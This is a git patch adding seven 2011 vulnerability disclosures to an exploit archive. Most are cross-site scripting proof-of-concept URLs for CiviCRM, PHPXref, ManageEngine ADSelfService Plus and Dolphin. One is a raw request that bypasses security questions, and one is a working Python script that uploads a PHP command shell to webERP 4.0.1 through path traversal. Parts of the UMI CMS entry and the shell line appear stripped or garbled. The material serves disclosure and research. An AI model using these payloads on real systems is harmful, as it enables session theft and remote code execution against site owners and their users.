From 430fa482490eec39e262e526ea4400041ec8764a Mon Sep 17 00:00:00 2001 From: Offensive Security Date: Mon, 24 Nov 2014 04:47:19 +0000 Subject: [PATCH] Updated 11_24_2014 --- files.csv | 9 ++++- platforms/php/webapps/35327.txt | 28 +++++++++++++++ platforms/php/webapps/35328.txt | 47 +++++++++++++++++++++++++ platforms/php/webapps/35329.txt | 9 +++++ platforms/php/webapps/35330.txt | 24 +++++++++++++ platforms/php/webapps/35331.txt | 9 +++++ platforms/php/webapps/35332.txt | 10 ++++++ platforms/php/webapps/35333.py | 61 +++++++++++++++++++++++++++++++++ 8 files changed, 196 insertions(+), 1 deletion(-) create mode 100755 platforms/php/webapps/35327.txt create mode 100755 platforms/php/webapps/35328.txt create mode 100755 platforms/php/webapps/35329.txt create mode 100755 platforms/php/webapps/35330.txt create mode 100755 platforms/php/webapps/35331.txt create mode 100755 platforms/php/webapps/35332.txt create mode 100755 platforms/php/webapps/35333.py diff --git a/files.csv b/files.csv index 2dff0d020..1d9f6da17 100755 --- a/files.csv +++ b/files.csv @@ -18183,7 +18183,7 @@ id,file,description,date,author,platform,type,port 20912,platforms/windows/remote/20912.txt,"Trend Micro InterScan VirusWall for Windows NT 3.51 Configurations Modification Vulnerability",2001-06-12,"SNS Advisory",windows,remote,0 20913,platforms/php/webapps/20913.txt,"Disqus Blog Comments Blind SQL Injection Vulnerability",2012-08-29,Spy_w4r3,php,webapps,0 20914,platforms/cgi/remote/20914.pl,"cgiCentral WebStore 400 Administrator Authentication Bypass Vulnerability",2001-05-06,"Igor Dobrovitski",cgi,remote,0 -20915,platforms/windows/local/20915.py,"ActFax 4.31 Local Privilege Escalation Exploit",2012-08-29,"Craig Freyman",windows,local,0 +20915,platforms/windows/local/20915.py,"ActFax 4.31 - Local Privilege Escalation Exploit",2012-08-29,"Craig Freyman",windows,local,0 20916,platforms/cgi/remote/20916.pl,"cgiCentral WebStore 400 Arbitrary Command Execution Vulnerability",2001-05-06,"Igor Dobrovitski",cgi,remote,0 20917,platforms/windows/dos/20917.txt,"Winlog Lite SCADA HMI system SEH 0verwrite Vulnerability",2012-08-29,Ciph3r,windows,dos,0 20918,platforms/php/webapps/20918.txt,"Wordpress HD Webplayer 1.1 - SQL Injection Vulnerability",2012-08-29,JoinSe7en,php,webapps,0 @@ -31817,3 +31817,10 @@ id,file,description,date,author,platform,type,port 35322,platforms/windows/local/35322.txt,"Privacyware Privatefirewall 7.0 - Unquoted Service Path Privilege Escalation",2014-11-22,LiquidWorm,windows,local,0 35323,platforms/php/webapps/35323.md,"MyBB <= 1.8.2 - unset_globals() Function Bypass and Remote Code Execution Vulnerability",2014-11-22,"Taoguang Chen",php,webapps,0 35325,platforms/hardware/webapps/35325.txt,"Netgear Wireless Router WNR500 - Parameter Traversal Arbitrary File Access Exploit",2014-11-22,LiquidWorm,hardware,webapps,0 +35327,platforms/php/webapps/35327.txt,"CiviCRM 3.3.3 Multiple Cross Site Scripting Vulnerabilities",2011-02-08,"AutoSec Tools",php,webapps,0 +35328,platforms/php/webapps/35328.txt,"UMI CMS 2.8.1.2 Multiple Cross Site Scripting Vulnerabilities",2011-02-08,"High-Tech Bridge SA",php,webapps,0 +35329,platforms/php/webapps/35329.txt,"PHPXref 0.7 'nav.html' Cross Site Scripting Vulnerability",2011-02-09,MustLive,php,webapps,0 +35330,platforms/php/webapps/35330.txt,"ManageEngine ADSelfService Plus 4.4 POST Request Manipulation Security Question Weakness",2011-02-10,"Core Security",php,webapps,0 +35331,platforms/php/webapps/35331.txt,"ManageEngine ADSelfService Plus 4.4 EmployeeSearch.cc Multiple Parameter XSS",2011-02-10,"Core Security",php,webapps,0 +35332,platforms/php/webapps/35332.txt,"Dolphin 7.0.4 Multiple Cross Site Scripting Vulnerabilities",2011-02-10,"AutoSec Tools",php,webapps,0 +35333,platforms/php/webapps/35333.py,"webERP 4.0.1 'InputSerialItemsFile.php' Arbitrary File Upload Vulnerability",2011-02-10,"AutoSec Tools",php,webapps,0 diff --git a/platforms/php/webapps/35327.txt b/platforms/php/webapps/35327.txt new file mode 100755 index 000000000..b6049a99a --- /dev/null +++ b/platforms/php/webapps/35327.txt @@ -0,0 +1,28 @@ +source: http://www.securityfocus.com/bid/46275/info + +CiviCRM is prone to multiple cross-site scripting vulnerabilities because they fail to properly sanitize user-supplied input. + +An attacker may leverage these issues to execute arbitrary HTML and script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks. + +CiviCRM 3.3.3. is vulnerable; prior versions may also be affected. + +Drupal: + +http://www.example.com/drupal-6.20/sites/all/modules/civicrm/packages/OpenFlashChart/php-ofc-library/ofc_upload_image.php?defaultPath=%3Cscript%3Ealert(0)%3C/script%3E + +http://www.example.com/drupal-6.20/sites/all/modules/civicrm/packages/amfphp/browser/code.php?class=%3Cscript%3Ealert(0)%3C/script%3E + +http://www.example.com/drupal-6.20/sites/all/modules/civicrm/packages/amfphp/browser/details.php?class= + +http://www.example.com/drupal-6.20/sites/all/modules/civicrm/packages/amfphp/browser/methodTable.php?class=%3Cscript%3Ealert(0)%3C/script%3E + + +Joomla: + +http://www.example.com/joomla/administrator/components/com_civicrm/civicrm/packages/OpenFlashChart/php-ofc-library/ofc_upload_image.php?defaultPath=%3Cscript%3Ealert(0)%3C/script%3E + +http://www.example.com/joomla/administrator/components/com_civicrm/civicrm/packages/amfphp/browser/methodTable.php?class=%3Cscript%3Ealert(0)%3C/script%3E + +http://www.example.com/joomla/administrator/components/com_civicrm/civicrm/packages/PHPgettext/examples/pigs_dropin.php?lang=0%3Cscript%3Ealert(0)%3C/script%3E + +http://www.example.com/joomla/administrator/components/com_civicrm/civicrm/packages/PHPgettext/examples/pigs_fallback.php?lang=%3Cscript%3Ealert(0)%3C/script%3E \ No newline at end of file diff --git a/platforms/php/webapps/35328.txt b/platforms/php/webapps/35328.txt new file mode 100755 index 000000000..f5b4298a1 --- /dev/null +++ b/platforms/php/webapps/35328.txt @@ -0,0 +1,47 @@ +source: http://www.securityfocus.com/bid/46280/info + +UMI CMS is prone to multiple cross-site-scripting vulnerabilities because it fails to properly sanitize user-supplied input. + +An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks. + +UMI CMS 2.8.1.2 is vulnerable; other versions may also be affected. + +
+ + +'> + + + + + + + + + +
+ + + + +
+ + + +'> + + + + + + + + + + +
+ \ No newline at end of file diff --git a/platforms/php/webapps/35329.txt b/platforms/php/webapps/35329.txt new file mode 100755 index 000000000..54c51ed92 --- /dev/null +++ b/platforms/php/webapps/35329.txt @@ -0,0 +1,9 @@ +source: http://www.securityfocus.com/bid/46302/info + +PHPXref is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied input. + +Exploiting these issues will allow an attacker to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site and steal cookie-based authentication credentials. + +Versions prior to PHPXref 0.7 are vulnerable; other versions may also be affected. + +http://www.example.com/nav.html?javascript:alert(document.cookie) \ No newline at end of file diff --git a/platforms/php/webapps/35330.txt b/platforms/php/webapps/35330.txt new file mode 100755 index 000000000..edda3caaa --- /dev/null +++ b/platforms/php/webapps/35330.txt @@ -0,0 +1,24 @@ +source: http://www.securityfocus.com/bid/46331/info + +ManageEngine ADSelfService Plus is prone to multiple vulnerabilities, including multiple security-bypass and cross-site scripting vulnerabilities. + +Attackers can exploit these issues to bypass certain security restrictions and to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help them steal cookie-based authentication credentials and launch other attacks. + +ManageEngine ADSelfService Plus 4.4 is vulnerable; other versions may also be affected. + +POST /accounts/ValidateAnswers?methodToCall=validateAll HTTP/1.1 + +Host: SERVER +User-Agent: Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.2.13) Gecko/20101206 Ubuntu/10.10 (maverick) Firefox/3.6.13 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 +Accept-Language: en-us,en;q=0.5 +Accept-Encoding: gzip,deflate +Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 +Keep-Alive: 115 +Proxy-Connection: keep-alive +Referer: http://www.example.com/accounts/ValidateUser +Cookie: JSESSIONID=8F93EB242EF06C51BE93EB0CEDA69085 +Content-Type: application/x-www-form-urlencoded +Content-Length: 294 + +loginId=1501&Hide_Captcha=0&POLICY_ID=1&Confirm_Answer=1&SESSION_EXPIRY_TIME=5&LOGIN_NAME=alice&REM_SESSION_TIME=00%3A40&bAns=11111&bQues=PreDefined-2&bAns=22222&bQues=PreDefined-3&bAns=33333&bQues=PreDefined-4&bAns=44444&bQues=PreDefined-5&quesList=4&DIGEST=qodpgd&next=Continue&DIS_ALL_QUES=1 \ No newline at end of file diff --git a/platforms/php/webapps/35331.txt b/platforms/php/webapps/35331.txt new file mode 100755 index 000000000..c85cfa2b4 --- /dev/null +++ b/platforms/php/webapps/35331.txt @@ -0,0 +1,9 @@ +source: http://www.securityfocus.com/bid/46331/info + +ManageEngine ADSelfService Plus is prone to multiple vulnerabilities, including multiple security-bypass and cross-site scripting vulnerabilities. + +Attackers can exploit these issues to bypass certain security restrictions and to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help them steal cookie-based authentication credentials and launch other attacks. + +ManageEngine ADSelfService Plus 4.4 is vulnerable; other versions may also be affected. + +http://www.example.com/EmployeeSearch.cc?actionId=showList&searchString=alice%22%20onmouseover=%22alert%28%27xss%27%29¶meterName=name&searchType=containshttp://www.example.com/EmployeeSearch.cc?actionId=Search¶meterName=name&searchType=contains&searchString=alice%22+onMouseOver%3D%22javascript%3Aalert%28%27xss%27%29 \ No newline at end of file diff --git a/platforms/php/webapps/35332.txt b/platforms/php/webapps/35332.txt new file mode 100755 index 000000000..4b84567d2 --- /dev/null +++ b/platforms/php/webapps/35332.txt @@ -0,0 +1,10 @@ +source: http://www.securityfocus.com/bid/46337/info + +Dolphin is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input. + +An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks. + +Dolphin 7.0.4 is vulnerable; other versions may also be affected. + +http://www.example.com/dolphin/explanation.php?explain=%3Cscript%3Ealert(0)%3C/script%3E +http://www.example.com/dolphin/modules/boonex/custom_rss/post_mod_crss.php?relocate=%22%3E%3Cscript%3Ealert(0)%3C/script%3E \ No newline at end of file diff --git a/platforms/php/webapps/35333.py b/platforms/php/webapps/35333.py new file mode 100755 index 000000000..2996f924e --- /dev/null +++ b/platforms/php/webapps/35333.py @@ -0,0 +1,61 @@ +source: http://www.securityfocus.com/bid/46341/info + +webERP is prone to an arbitrary-file-upload vulnerability because the application fails to adequately sanitize user-supplied input. + +An attacker can exploit this issue to upload arbitrary code and run it in the context of the webserver process. This may facilitate unauthorized access or privilege escalation; other attacks are also possible. + +webERP 4.0.1 is vulnerable; other versions may also be affected. + +import socket + +host = 'localhost' +path = '/weberp' +shell_path = path + '/shell.php' +port = 80 + +def upload_shell(): + s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) + s.connect((host, port)) + s.settimeout(8) + + s.send('POST ' + path + '/includes/InputSerialItemsFile.php?LineNo=/../../../shell.php%00 HTTP/1.1\r\n' + 'Host: localhost\r\n' + 'Connection: keep-alive\r\n' + 'User-Agent: x\r\n' + 'Content-Length: 264\r\n' + 'Cache-Control: max-age=0\r\n' + 'Origin: null\r\n' + 'Content-Type: multipart/form-data; boundary=----x\r\n' + 'Accept: text/html\r\n' + 'Accept-Encoding: gzip,deflate,sdch\r\n' + 'Accept-Language: en-US,en;q=0.8\r\n' + 'Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3\r\n' + '\r\n' + '------x\r\n' + 'Content-Disposition: form-data; name="LineNo"\r\n' + '\r\n' + 'shell.php\r\n' + '------x\r\n' + 'Content-Disposition: form-data; name="ImportFile"; filename="shell.php"\r\n' + 'Content-Type: application/octet-stream\r\n' + '\r\n' + '\' + system($_GET[\'CMD\']) + \'\'; ?>\r\n' + '------x--\r\n' + '\r\n') + + resp = s.recv(8192) + + http_ok = 'HTTP/1.1 200 OK' + + if http_ok not in resp[:len(http_ok)]: + print 'error uploading shell' + return + else: print 'shell uploaded' + + s.send('GET ' + shell_path + ' HTTP/1.1\r\n'\ + 'Host: ' + host + '\r\n\r\n') + + if http_ok not in s.recv(8192)[:len(http_ok)]: print 'shell not found' + else: print 'shell located at http://' + host + shell_path + +upload_shell()